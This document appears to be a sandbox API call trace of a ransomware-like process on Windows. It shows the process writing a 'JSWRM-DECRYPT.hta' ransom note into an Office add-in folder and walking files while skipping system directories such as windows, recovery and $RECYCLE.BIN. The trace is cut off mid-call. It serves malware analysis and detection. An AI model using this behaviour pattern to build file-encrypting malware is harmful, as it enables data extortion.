[0123.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.020] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.020] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.021] CloseHandle (hObject=0x338) returned 1 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ca\\jswrm-decrypt.hta")) returned 0x20 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.021] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffd0ca2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0123.022] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.022] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffd0ca2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.022] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.022] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.022] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffd0ca2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ffd0ca2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ffd0ca2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.022] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cfbc75, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cfbc75, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.022] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.023] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x61b241f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.023] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.024] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.024] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0123.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.025] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.025] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.025] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.025] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0123.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.026] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="cs", cAlternateFileName="")) returned 1 [0123.026] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="...") returned 1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="windows") returned -1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="recovery") returned -1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="perflogs") returned -1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="documents and settings") returned -1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="$RECYCLE.BIN") returned 1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="system volume information") returned -1 [0123.026] lstrcmpiW (lpString1="cs", lpString2="msocache") returned -1 [0123.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.026] RtlAllocateHeap 